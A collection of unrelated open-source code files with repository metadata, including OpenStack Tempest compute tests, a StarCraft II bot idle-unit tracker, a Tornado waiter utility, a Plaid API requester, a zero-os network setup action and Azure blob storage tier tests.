frame1 = ttk.Frame(pview.frame)
for i in range(3):
ttk.Button(frame1, text=i).pack(side="left")
frame2 = ttk.Frame(pview.frame)
ttk.Checkbutton(frame2, text="Checkbutton").pack()
frame3 = ttk.Frame(pview.frame)
ttk.Label(frame3, text="Frame 3").pack(side="bottom")
pview.add(child=frame1)
pview.add(child=frame2)
pview.add(child=frame3)
root.mainloop()
| {
"content_hash": "3e41181ce8ba27770ab9441f872fcf1c",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 91,
"avg_line_length": 32.42857142857143,
"alnum_prop": 0.561453744493392,
"repo_name": "DeflatedPickle/pkinter",
"id": "c6c43a821f0fe0c45554d399a4a556f45a86b8c1",
"size": "4586",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pkinter/pageview.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "107"
},
{
"name": "Python",
"bytes": "104715"
}
],
"symlink_target": ""
} |
import uuid
from tempest_lib import exceptions as lib_exc
import testtools
from tempest.api.compute import base
from tempest.common import tempest_fixtures as fixtures
from tempest.common.utils import data_utils
from tempest import config
from tempest import test
CONF = config.CONF
class ServersAdminNegativeTestJSON(base.BaseV2ComputeAdminTest):
"""
Tests Servers API using admin privileges
"""
@classmethod
def resource_setup(cls):
super(ServersAdminNegativeTestJSON, cls).resource_setup()
cls.client = cls.os_adm.servers_client
cls.non_adm_client = cls.servers_client
cls.flavors_client = cls.os_adm.flavors_client
cls.tenant_id = cls.client.tenant_id
cls.s1_name = data_utils.rand_name('server')
server = cls.create_test_server(name=cls.s1_name,
wait_until='ACTIVE')
cls.s1_id = server['id']
def _get_unused_flavor_id(self):
flavor_id = data_utils.rand_int_id(start=1000)
while True:
try:
self.flavors_client.get_flavor_details(flavor_id)
except lib_exc.NotFound:
break
flavor_id = data_utils.rand_int_id(start=1000)
return flavor_id
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative', 'gate'])
def test_resize_server_using_overlimit_ram(self):
# NOTE(mriedem): Avoid conflicts with os-quota-class-sets tests.
self.useFixture(fixtures.LockFixture('compute_quotas'))
flavor_name = data_utils.rand_name("flavor-")
flavor_id = self._get_unused_flavor_id()
quota_set = self.quotas_client.get_default_quota_set(self.tenant_id)
ram = int(quota_set['ram']) + 1
vcpus = 8
disk = 10
flavor_ref = self.flavors_client.create_flavor(flavor_name,
ram, vcpus, disk,
flavor_id)
self.addCleanup(self.flavors_client.delete_flavor, flavor_id)
self.assertRaises((lib_exc.Unauthorized, lib_exc.OverLimit),
self.client.resize,
self.servers[0]['id'],
flavor_ref['id'])
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative', 'gate'])
def test_resize_server_using_overlimit_vcpus(self):
# NOTE(mriedem): Avoid conflicts with os-quota-class-sets tests.
self.useFixture(fixtures.LockFixture('compute_quotas'))
flavor_name = data_utils.rand_name("flavor-")
flavor_id = self._get_unused_flavor_id()
ram = 512
quota_set = self.quotas_client.get_default_quota_set(self.tenant_id)
vcpus = int(quota_set['cores']) + 1
disk = 10
flavor_ref = self.flavors_client.create_flavor(flavor_name,
ram, vcpus, disk,
flavor_id)
self.addCleanup(self.flavors_client.delete_flavor, flavor_id)
self.assertRaises((lib_exc.Unauthorized, lib_exc.OverLimit),
self.client.resize,
self.servers[0]['id'],
flavor_ref['id'])
@test.attr(type=['negative', 'gate'])
def test_reset_state_server_invalid_state(self):
self.assertRaises(lib_exc.BadRequest,
self.client.reset_state, self.s1_id,
state='invalid')
@test.attr(type=['negative', 'gate'])
def test_reset_state_server_invalid_type(self):
self.assertRaises(lib_exc.BadRequest,
self.client.reset_state, self.s1_id,
state=1)
@test.attr(type=['negative', 'gate'])
def test_reset_state_server_nonexistent_server(self):
self.assertRaises(lib_exc.NotFound,
self.client.reset_state, '999')
@test.attr(type=['negative', 'gate'])
def test_get_server_diagnostics_by_non_admin(self):
# Non-admin user can not view server diagnostics according to policy
self.assertRaises(lib_exc.Unauthorized,
self.non_adm_client.get_server_diagnostics,
self.s1_id)
@test.attr(type=['negative', 'gate'])
def test_migrate_non_existent_server(self):
# migrate a non existent server
self.assertRaises(lib_exc.NotFound,
self.client.migrate_server,
str(uuid.uuid4()))
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@testtools.skipUnless(CONF.compute_feature_enabled.suspend,
'Suspend is not available.')
@test.attr(type=['negative', 'gate'])
def test_migrate_server_invalid_state(self):
# create server.
server = self.create_test_server(wait_until='ACTIVE')
server_id = server['id']
# suspend the server.
resp, _ = self.client.suspend_server(server_id)
self.assertEqual(202, resp.status)
self.client.wait_for_server_status(server_id, 'SUSPENDED')
# migrate an suspended server should fail
self.assertRaises(lib_exc.Conflict,
self.client.migrate_server,
server_id)
| {
"content_hash": "42a6b496cceb388f119487987ec5d200",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 76,
"avg_line_length": 41.909774436090224,
"alnum_prop": 0.5767850735557948,
"repo_name": "Vaidyanath/tempest",
"id": "7fd87f6a04b1095d4db4c531a85ec08ad171443f",
"size": "6195",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/api/compute/admin/test_servers_negative.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "695"
},
{
"name": "Python",
"bytes": "2788179"
},
{
"name": "Shell",
"bytes": "8560"
}
],
"symlink_target": ""
} |
import numpy as np
import random
from oscar.constants import *
from oscar.util.point import Point
from oscar.shared.minimap import Minimap
from oscar.shared.screen import Screen
from oscar.shared.camera import Camera
from oscar.util.unit import Unit
from oscar.util.location import Location
""" Keeps track of idle units. """
class IdleTracker():
"""
Number of consecutive steps a unit should be seen at the same place
to assess it's idle.
"""
_MINIMAP_IDLE_STEPS = 5
_SCREEN_IDLE_STEPS = 10
# states
_INITIAL_STATE = 0
_SCAN_SCREEN_STATE = 1
def __init__(self):
self._last_obs = [None] * IdleTracker._MINIMAP_IDLE_STEPS # circular array
self._idle_units = []
self._idle_units_map = None
self._blacklist_map = None
""" state machine """
self._state = None
self._candidate = None
self._scan_count = None
self._candidate_list = None
self.reset_search()
def update(self, obs, shared):
"""
Updates tracking data using minimap view.
Should be called at the beginning of every step.
"""
self._last_obs[shared['env'].timestamp % IdleTracker._MINIMAP_IDLE_STEPS] = obs
if self._idle_units_map is None:
self._idle_units_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))
if self._blacklist_map is None:
self._blacklist_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))
self._update_idle_units_map(obs, shared)
self._update_blacklist_map(obs, shared)
def reset_search(self):
"""
Cancels search in progress,
but keeps in memory found idle units.
"""
self._state = IdleTracker._INITIAL_STATE
self._scan_count = 0
self._candidate_list = None
def search_idle_unit(self, obs, shared, unit_ids=None, target=None, max_dist=None):
"""
Searches for idle units, close to a given location.
To do so, checks the minimap, moves the camera and observes the screen during multiple steps.
Needs to be called multiple times at successive steps with the same arguments.
:param unit_ids: ids of units which should be found
:param target: location close to which units should be found
:param max_dist: maximum distance from the point a unit could be found
:return: a dictionary with the following fields:
'actions': actions to be performed to keep going the search (could be None)
'unit': the point of a found unit if one has been found at this step (could be None)
"""
response = {
'actions': None,
'unit': None
}
if self._state == IdleTracker._INITIAL_STATE:
self._candidate = self._get_best_idle_candidate(obs, shared, unit_ids, target, max_dist)
if self._candidate: # moves camera to observe candidate
response['actions'] = [actions.FunctionCall(MOVE_CAMERA,
[self._candidate.location.minimap.to_array()])]
self._state = IdleTracker._SCAN_SCREEN_STATE
else: # no candidate: search failed
return response
elif self._state == IdleTracker._SCAN_SCREEN_STATE:
friendly_units = self._get_friendly_units_on_screen(obs, shared)
if self._candidate_list is None:
self._candidate_list = friendly_units
else:
# Takes intersection of previous and new scanned units
new_candidate_list = []
for u in friendly_units:
for v in self._candidate_list:
if u.equals(v):
new_candidate_list.append(u)
self._candidate_list = new_candidate_list
if len(self._candidate_list) == 0: # No idle unit on the screen
if self._candidate in self._idle_units:
self._idle_units.remove(self._candidate)
self._blacklist_screen(obs, shared)
self.reset_search()
else:
self._scan_count += 1
if self._scan_count >= IdleTracker._SCREEN_IDLE_STEPS: # idle units found on screen
for u in self._candidate_list:
if self._blacklist_map[u.location.minimap.x, u.location.minimap.y] == 0:
if u.unit_id in TERRAN_BUIDINGS:
self._blacklist_map[u.location.minimap.x, u.location.minimap.y] = 1
elif not response['unit'] \
and (unit_ids is None or u.unit_id in unit_ids):
response['unit'] = u
if u in self._idle_units:
self._idle_units.remove(u)
self._idle_units_map[u.location.minimap.x, u.location.minimap.y] = 0
self._blacklist_map[u.location.minimap.x, u.location.minimap.y] = 1
else:
if self._idle_units_map[u.location.minimap.x, u.location.minimap.y] == 0:
self._idle_units.append(u)
self._idle_units_map[u.location.minimap.x, u.location.minimap.y] = 1
self.reset_search()
else:
response['actions'] = [actions.FunctionCall(NO_OP, [])]
if not response['actions'] and not response['unit']:
return self.search_idle_unit(obs, shared, unit_ids, target, max_dist)
else:
return response
@staticmethod
def _get_friendly_units_on_screen(obs, shared):
scanned = shared['screen'].scan(obs, shared)
friendly_units = []
for s in scanned:
if s.player_id == PLAYER_SELF and s.unit_id not in TERRAN_BUIDINGS:
loc = Location(screen_loc=s.location.screen, camera_loc=shared['camera'].location(obs, shared))
loc.compute_minimap_loc(obs, shared)
friendly_units.append(Unit(loc, s.unit_id))
return friendly_units
def _update_idle_units_map(self, obs, shared):
cur_minimap = obs.observation[MINIMAP][MINI_PLAYER_RELATIVE]
for x in range(shared['minimap'].width(obs)):
for y in range(shared['minimap'].height(obs)):
if cur_minimap[y, x] != PLAYER_SELF \
and self._idle_units_map[x, y] != 0:
self._idle_units_map[x, y] = 0
for u in self._idle_units:
if u.location.minimap.equals(Point(x, y)):
self._idle_units.remove(u)
def _update_blacklist_map(self, obs, shared):
cur_minimap = obs.observation[MINIMAP][MINI_PLAYER_RELATIVE]
for x in range(shared['minimap'].width(obs)):
for y in range(shared['minimap'].height(obs)):
if cur_minimap[y, x] != PLAYER_SELF \
and self._blacklist_map[x, y] != 0:
self._blacklist_map[x, y] = 0
def _blacklist_screen(self, obs, shared):
camera = obs.observation[MINIMAP][MINI_CAMERA]
player_relative = obs.observation[MINIMAP][MINI_PLAYER_RELATIVE]
for x in range(shared['minimap'].width(obs)):
for y in range(shared['minimap'].height(obs)):
if camera[y, x] == 1 and player_relative[y, x] == PLAYER_SELF:
self._blacklist_map[x, y] = 1
def _get_new_candidates_from_minimap(self, obs, shared):
friendly_fixed_points = []
for x in range(shared['minimap'].width(obs)):
for y in range(shared['minimap'].height(obs)):
if self._blacklist_map[x, y] != 0 or self._idle_units_map[x, y] != 0:
continue
is_idle = True
for i in range(IdleTracker._MINIMAP_IDLE_STEPS):
if not self._last_obs[i]:
return []
if self._last_obs[i].observation[MINIMAP][MINI_PLAYER_RELATIVE][y, x] != PLAYER_SELF:
is_idle = False
break
if is_idle:
friendly_fixed_points.append(
Unit(Location(minimap_loc=Point(x, y))))
return friendly_fixed_points
def _get_best_idle_candidate(self, obs, shared, unit_ids=None, target=None, max_dist=None):
"""
Returns minimap position of an idle unit candidate.
"""
best_candidate, min_dist = None, None
""" selects best identified idle unit if it exists """
for u in self._idle_units:
if self._blacklist_map[u.location.minimap.x, u.location.minimap.y] == 1:
self._idle_units.remove(u)
self._idle_units_map[u.location.minimap.x, u.location.minimap.y] = 0
else:
if unit_ids is None or u.unit_id in unit_ids:
if not target:
best_candidate = u
break
else:
dist = target.distance(u.location.minimap)
if (not max_dist or dist <= max_dist) and \
(not min_dist or dist < min_dist):
best_candidate = u
min_dist = dist
""" if there is no identified idle unit, try to find a candidate with the minimap """
if not best_candidate:
minimap_candidates = self._get_new_candidates_from_minimap(obs, shared)
random.shuffle(minimap_candidates)
for u in minimap_candidates:
if not target:
best_candidate = u
break
else:
dist = target.distance(u.location.minimap)
if (not max_dist or dist <= max_dist) and \
(not min_dist or dist < min_dist):
best_candidate = u
min_dist = dist
return best_candidate
| {
"content_hash": "69c050100573d6d3cc99d525412e7388",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 111,
"avg_line_length": 42.25819672131148,
"alnum_prop": 0.5391329647948793,
"repo_name": "Xaxetrov/OSCAR",
"id": "51898359ae9382049362d9eccd2fa5500be4e833",
"size": "10311",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oscar/shared/idle_tracker.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "250337"
},
{
"name": "Shell",
"bytes": "3498"
}
],
"symlink_target": ""
} |
def new(num_buckets=256):
"""Initializes a Map with the given number of buckets."""
aMap = []
for i in range(0, num_buckets):
aMap.append([])
return aMap
def hash_key(aMap, key):
"""Given a key this will create a number and then convert it to
an index for the aMap's buckets."""
return hash(key) % len(aMap)
def get_bucket(aMap, key):
"""Given a key, find the bucket where it would go."""
bucket_id = hash_key(aMap, key)
return aMap[bucket_id]
def get_slot(aMap, key, default=None):
bucket = get_bucket(aMap, key)
for i, kv in enumerate(bucket):
k, v = kv
if key == k:
return i, k, v
return -1, key, default
| {
"content_hash": "fb8f7eb58be8db81491fdafb71b602fa",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 67,
"avg_line_length": 26,
"alnum_prop": 0.5997150997150997,
"repo_name": "githubfun/lphw",
"id": "2a1374241bf29af48c99b4f368ba8457d615e450",
"size": "702",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "hashmap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "956"
},
{
"name": "Python",
"bytes": "41990"
}
],
"symlink_target": ""
} |
"""Wait for all subtasks have done.
"""
import tornado
import tornado.locks
from tornado.concurrent import Future
class ProcessWaiter(tornado.locks._TimeoutGarbageCollector):
def __init__(self):
super(ProcessWaiter, self).__init__()
self._value = 0
def __repr__(self):
res = super(ProcessWaiter, self).__repr__()
extra = 'locked' if self._value == 0 else 'unlocked,value:{0}'.format(
self._value)
if self._waiters:
extra = '{0},waiters:{1}'.format(extra, len(self._waiters))
return '<{0} [{1}]>'.format(res[1:-1], extra)
def __enter__(self):
self.processing()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def processing(self):
"""Increment the counter and wake one waiter."""
self._value -= 1
def done(self):
self._value += 1
if self._value == 0:
# wake all waiters and release them
while self._waiters:
waiter = self._waiters.popleft()
waiter.set_result(tornado.locks._ReleasingContextManager(waiter))
def wait_all_done(self, timeout=None):
waiter = Future()
if self._value == 0:
waiter.set_result(tornado.locks._ReleasingContextManager(self))
elif self._value < 0:
self._waiters.append(waiter)
if timeout:
def on_timeout():
waiter.set_exception(tornado.gen.TimeoutError())
self._garbage_collect()
io_loop = tornado.ioloop.IOLoop.current()
timeout_handle = io_loop.add_timeout(timeout, on_timeout)
waiter.add_done_callback(
lambda _: io_loop.remove_timeout(timeout_handle))
else:
raise ProcessWaiterSemaphoreException('Semaphore value is positive (val:%d)' % self._value)
return waiter
class ProcessWaiterSemaphoreException(Exception):
pass
| {
"content_hash": "dc5621307a7a4ca3b23a05e203d718c9",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 103,
"avg_line_length": 33.032786885245905,
"alnum_prop": 0.5712158808933002,
"repo_name": "ly0/starfarming-python",
"id": "430a23fd10c18592aea0f46c2df1f1e73fec3911",
"size": "2030",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tornado/wait_subtasks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20633"
}
],
"symlink_target": ""
} |
from chameleon.tales import StructureExpr
from chameleon.codegen import template
from smc.mw import MediaWiki
class MediaWikiExpression(StructureExpr):
def __call__(self, target, engine):
compiler = engine.parse(self.expression)
body = compiler.assign_value(target)
def mw_render(content):
return self.wrapper_class(MediaWiki(content).as_string())
return body + template("from smc.mw import MediaWiki ; target = MediaWiki(target).as_string()",
target=target,
wrapper=self.wrapper_class)
| {
"content_hash": "4b4f3c33394e022d81e1cf9b6ba6fdb1",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 103,
"avg_line_length": 35.411764705882355,
"alnum_prop": 0.6428571428571429,
"repo_name": "cyplp/cyplp.wikipedia",
"id": "7a2432f1fa01a421d82076a163e36b435a11f013",
"size": "602",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyplp/wikipedia/mw_expression.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2874"
},
{
"name": "Python",
"bytes": "14822"
}
],
"symlink_target": ""
} |
from functools import partial
from plaid.errors import PLAID_ERROR_MAP
from plaid.http import _outer_http_request
from plaid.utils import to_json
_base_http_request = _outer_http_request()
# method keyword arg to simplify partial function application
def http_request(url, method=None, data=None, suppress_errors=False):
response = _base_http_request(url, method, data or {})
ERROR = PLAID_ERROR_MAP.get(response.status_code)
if not suppress_errors and ERROR is not None:
json_data = to_json(response)
raise ERROR(json_data['resolve'], json_data['code'])
else:
return response
delete_request = partial(http_request, method='DELETE')
get_request = partial(http_request, method='GET')
post_request = partial(http_request, method='POST')
patch_request = partial(http_request, method='PATCH')
| {
"content_hash": "efb586c5bfdd59a9ab364177ead49335",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 69,
"avg_line_length": 32.19230769230769,
"alnum_prop": 0.7264038231780168,
"repo_name": "erikbern/plaid-python",
"id": "b271a5c9a1306ae8119f7e6566f61a52b00ed529",
"size": "837",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plaid/requester.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "153"
},
{
"name": "Python",
"bytes": "30013"
}
],
"symlink_target": ""
} |
raise Exception("TESS.py got replaced with PredictedTESS.py")
| {
"content_hash": "1b026ebebd203d831bb81c3d244f0513",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 61,
"avg_line_length": 62,
"alnum_prop": 0.8064516129032258,
"repo_name": "zkbt/exopop",
"id": "762823ef4e97d2bbe7f40ffac426f910588e84fe",
"size": "62",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exoatlas/populations/TESS.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "91104"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/furniture/jedi/shared_frn_all_banner_light.iff"
result.attribute_template_id = 6
result.stfName("frn_n","frn_all_banner_light")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "c5063d694aa3e55771b3d9b4df0c7e19",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 83,
"avg_line_length": 24.53846153846154,
"alnum_prop": 0.6990595611285266,
"repo_name": "obi-two/Rebelion",
"id": "9fba9271ce7bcceb494ebbfac65dc16287b058ce",
"size": "464",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/furniture/jedi/shared_frn_all_banner_light.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
def singleton(cls, *args, **kw):
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return getinstance | {
"content_hash": "c6afb38eeb64a7143420b4aadea89dc2",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 45,
"avg_line_length": 29.428571428571427,
"alnum_prop": 0.5776699029126213,
"repo_name": "jwang-share/theysay",
"id": "3bacaa3c3b5cba64fc5703070480e7f80741c0e1",
"size": "221",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "black3/factory/supports/singletonmaker.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CoffeeScript",
"bytes": "6594"
},
{
"name": "JavaScript",
"bytes": "24"
},
{
"name": "Python",
"bytes": "178214"
},
{
"name": "Ruby",
"bytes": "1486"
}
],
"symlink_target": ""
} |
from js9 import j
def configure(job):
"""
this method will be called from the node.zero-os install action.
"""
import netaddr
from zeroos.orchestrator.configuration import get_configuration, get_jwt_token
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.sal.Container import Container
nodeservice = job.service.aysrepo.serviceGet(role='node', instance=job.model.args['node_name'])
job.logger.info("execute network configure on {}".format(nodeservice))
node = Node.from_ays(nodeservice)
service = job.service
network = netaddr.IPNetwork(service.model.data.cidr)
addresses = node.network.get_addresses(network)
actor = service.aysrepo.actorGet("container")
config = get_configuration(service.aysrepo)
args = {
'node': node.name,
'hostname': 'ovs',
'flist': config.get('ovs-flist', 'https://hub.gig.tech/gig-official-apps/ovs.flist'),
'hostNetworking': True,
'privileged': True,
}
cont_service = actor.serviceCreate(instance='{}_ovs'.format(node.name), args=args)
job.context['token'] = get_jwt_token(job.service.aysrepo)
cont_service.executeAction('install', context=job.context)
container_client = Container.from_ays(cont_service, logger=service.logger).client
nics = node.client.info.nic()
nicmap = {nic['name']: nic for nic in nics}
freenics = node.network.get_free_nics()
if not freenics:
raise j.exceptions.RuntimeError("Could not find available nic")
# freenics = ([1000, ['eth0']], [100, ['eth1']])
for speed, nics in freenics:
if len(nics) >= 2:
break
else:
raise j.exceptions.RuntimeError("Could not find two equal available nics")
if 'backplane' not in nicmap:
container_client.json('ovs.bridge-add', {"bridge": "backplane", "options": {'stp_enable': 'true'}})
container_client.json('ovs.port-add', {"bridge": "backplane", "port": nics[0], "vlan": 0})
container_client.json('ovs.port-add', {"bridge": "backplane", "port": nics[1], "vlan": 0})
node.client.system('ip address add {storageaddr} dev backplane'.format(**addresses)).get()
node.client.system('ip link set dev {} mtu 2000'.format(nics[0])).get()
node.client.system('ip link set dev {} mtu 2000'.format(nics[1])).get()
node.client.system('ip link set dev backplane up').get()
if 'vxbackend' not in nicmap:
container_client.json('ovs.vlan-ensure', {'master': 'backplane', 'vlan': service.model.data.vlanTag, 'name': 'vxbackend'})
node.client.system('ip address add {vxaddr} dev vxbackend'.format(**addresses)).get()
node.client.system('ip link set dev vxbackend mtu 2000').get()
node.client.system('ip link set dev vxbackend up').get()
| {
"content_hash": "dd0012f48b8366b61ecbd678aa471160",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 130,
"avg_line_length": 46.18032786885246,
"alnum_prop": 0.6599219027334043,
"repo_name": "g8os/grid",
"id": "b269d7f98a3c3d1d84e2e8a923fe87fe30b0bf65",
"size": "2817",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "templates/network.switchless/actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import unittest
from azure.storage.blob import (
BlockBlobService,
)
from azure.storage.blob.models import StandardBlobTier, BatchSetBlobTierSubRequest, RehydratePriority
from tests.testcase import (
StorageTestCase,
record,
)
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'blob'
# ------------------------------------------------------------------------------
class BlobStorageAccountTest(StorageTestCase):
def setUp(self):
super(BlobStorageAccountTest, self).setUp()
self.bs = self._create_storage_service_for_blob_storage_account(BlockBlobService, self.settings)
self.container_name = self.get_resource_name('utcontainer')
if not self.is_playback():
self.bs.create_container(self.container_name)
def tearDown(self):
if not self.is_playback():
try:
self.bs.delete_container(self.container_name)
except:
pass
return super(BlobStorageAccountTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
def _create_blob(self):
blob_name = self._get_blob_reference()
self.bs.create_blob_from_bytes(self.container_name, blob_name, b'')
return blob_name
def assertBlobEqual(self, container_name, blob_name, expected_data):
actual_data = self.bs.get_blob_to_bytes(container_name, blob_name)
self.assertEqual(actual_data.content, expected_data)
# --Tests specific to Blob Storage Accounts (not general purpose)------------
@record
def test_standard_blob_tier_set_tier_api(self):
self.bs.create_container(self.container_name)
tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
for tier in tiers:
blob_name = self._get_blob_reference()
data = b'hello world'
self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)
self.assertIsNotNone(blob_ref.properties.blob_tier)
self.assertTrue(blob_ref.properties.blob_tier_inferred)
self.assertIsNone(blob_ref.properties.blob_tier_change_time)
blobs = list(self.bs.list_blobs(self.container_name))
# Assert
self.assertIsNotNone(blobs)
self.assertGreaterEqual(len(blobs), 1)
self.assertIsNotNone(blobs[0])
self.assertNamedItemInContainer(blobs, blob_name)
self.assertIsNotNone(blobs[0].properties.blob_tier)
self.assertTrue(blobs[0].properties.blob_tier_inferred)
self.assertIsNone(blobs[0].properties.blob_tier_change_time)
self.bs.set_standard_blob_tier(self.container_name, blob_name, tier)
blob_ref2 = self.bs.get_blob_properties(self.container_name, blob_name)
self.assertEqual(tier, blob_ref2.properties.blob_tier)
self.assertFalse(blob_ref2.properties.blob_tier_inferred)
self.assertIsNotNone(blob_ref2.properties.blob_tier_change_time)
blobs = list(self.bs.list_blobs(self.container_name))
# Assert
self.assertIsNotNone(blobs)
self.assertGreaterEqual(len(blobs), 1)
self.assertIsNotNone(blobs[0])
self.assertNamedItemInContainer(blobs, blob_name)
self.assertEqual(blobs[0].properties.blob_tier, tier)
self.assertFalse(blobs[0].properties.blob_tier_inferred)
self.assertIsNotNone(blobs[0].properties.blob_tier_change_time)
self.bs.delete_blob(self.container_name, blob_name)
def test_empty_batch_set_standard_blob_tier(self):
# Arrange
batch_set_standard_blob_tier_requests = list()
with self.assertRaises(ValueError):
self.bs.batch_set_standard_blob_tier(batch_set_standard_blob_tier_requests)
def test_batch_set_257_standard_blob_tier_for_blobs(self):
# Arrange
batch_set_standard_blob_tier_requests = list()
for i in range(0, 257):
batch_set_standard_blob_tier_requests.append(
BatchSetBlobTierSubRequest(self.container_name, i, StandardBlobTier.Archive))
with self.assertRaises(ValueError):
self.bs.batch_set_standard_blob_tier(batch_set_standard_blob_tier_requests)
@record
def test_set_standard_blob_tier_with_rehydrate_priority(self):
# Arrange
self.bs.create_container(self.container_name)
blob_name = self._create_blob()
blob_tier = StandardBlobTier.Archive
rehydrate_tier = StandardBlobTier.Cool
rehydrate_priority = RehydratePriority.Standard
# Act
self.bs.set_standard_blob_tier(self.container_name, blob_name, blob_tier,
rehydrate_priority=rehydrate_priority)
self.bs.set_standard_blob_tier(self.container_name, blob_name, rehydrate_tier)
blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertEquals('rehydrate-pending-to-cool', blob_ref.properties.rehydration_status)
@record
def test_batch_set_standard_blob_tier_for_one_blob(self):
# Arrange
batch_set_blob_tier_request = []
self.bs.create_container(self.container_name)
blob_name = self._get_blob_reference()
data = b'hello world'
blob_tier = StandardBlobTier.Cool
self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, blob_tier)
batch_set_blob_tier_request.append(sub_request)
# Act
resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)
blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertIsNotNone(resp)
self.assertEquals(len(batch_set_blob_tier_request), len(resp))
self.assertEquals(blob_tier, blob_ref.properties.blob_tier)
for sub_response in resp:
self.assertTrue(sub_response.is_successful)
@record
def test_batch_set_three_blob_tier(self):
# Arrange
self.bs.create_container(self.container_name)
tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
rehydrate_priority = [RehydratePriority.High, RehydratePriority.Standard, RehydratePriority.High]
blob_names = list()
batch_set_blob_tier_request = []
for i in range(0, len(tiers)):
blob_name = str(i)
data = b'hello world'
self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tiers[i], rehydrate_priority[i])
batch_set_blob_tier_request.append(sub_request)
blob_names.append(blob_name)
# Act
resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)
blob_refs = list()
for blob_name in blob_names:
blob_refs.append(self.bs.get_blob_properties(self.container_name, blob_name))
# Assert
self.assertIsNotNone(resp)
self.assertEquals(len(batch_set_blob_tier_request), len(resp))
for i in range(0, len(resp)):
self.assertTrue(resp[i].is_successful)
# make sure the tier for each blob is correct
self.assertEquals(tiers[i], blob_refs[i].properties.blob_tier)
@record
def test_batch_set_nine_standard_blob_tier(self):
# To make sure BatchSubResponse is bounded to a correct sub-request
# Arrange
self.bs.create_container(self.container_name)
tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot,
StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot,
StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
batch_set_blob_tier_request = []
# For even index, create batch delete sub-request for existing blob and their snapshot
# For odd index, create batch delete sub-request for non-existing blob
for i in range(0, len(tiers)):
blob_name = str(i)
if i % 2 is 0:
data = b'hello world'
self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tiers[i])
batch_set_blob_tier_request.append(sub_request)
# Act
resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)
# Assert
self.assertIsNotNone(resp)
